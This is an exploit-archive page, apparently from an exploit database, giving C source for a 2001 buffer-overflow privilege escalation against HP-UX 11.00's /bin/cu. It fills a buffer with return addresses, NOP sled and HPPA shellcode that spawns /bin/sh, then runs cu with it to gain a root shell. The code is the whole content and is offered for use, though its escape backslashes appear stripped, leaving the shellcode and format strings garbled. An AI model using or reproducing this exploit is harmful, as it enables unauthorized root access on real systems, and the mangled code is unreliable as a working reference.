HP-UX 11.0 /bin/cu Privilege Escalation Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP-UX 11.0 /bin/cu Privilege Escalation Exploit
# Published : 2001-01-13
# Author : zorgon
# Previous Title : Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux
# Next Title : Solaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit

/*
 * Copyright (c) 2001 Zorgon                              
 * All Rights Reserved                                    
 * The copyright notice above does not evidence any       
 * actual or intended publication of such source code.    
 * 
 * HP-UX /bin/cu exploit.
 * Tested on HP-UX 11.00 
 * zorgon@antionline.org (http://www.nightbird.free.fr) 
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define LEN 9778 
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200    /* it works for me */

u_char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */
"xe8x3fx1fxfdx08x21x02x80x34x02x01x02x08x41x04x02x60x40"
"x01x62xb4x5ax01x54x0bx39x02x99x0bx18x02x98x34x16x04xbe"
"x20x20x08x01xe4x20xe0x08x96xd6x05x34xdexadxcaxfe/bin/shxff";

int 
main(int argc , char **argv){
  char buffer[LEN+8];
  int i;
  long retaddr = RET;
  int offset = OFFSET;
 
  if(argc>1) offset = atoi(argv[1]);
    for (i=0;i<LEN;i+=4)
      *(long *)&buffer[i] = retaddr + offset; 

  for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++) 
    *(buffer+i) = HPPA_NOP;

  memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
  fprintf(stderr, "HP-UX 11.00 /bin/cu exploitn");
  fprintf(stderr, "Copyright (c) 2001 Zorgonn");                              
  fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]n", retaddr + offset, offset, strlen(buffer));

  execl("/bin/cu","cu","-l",buffer,0);
}


// www.Syue.com [2001-01-13]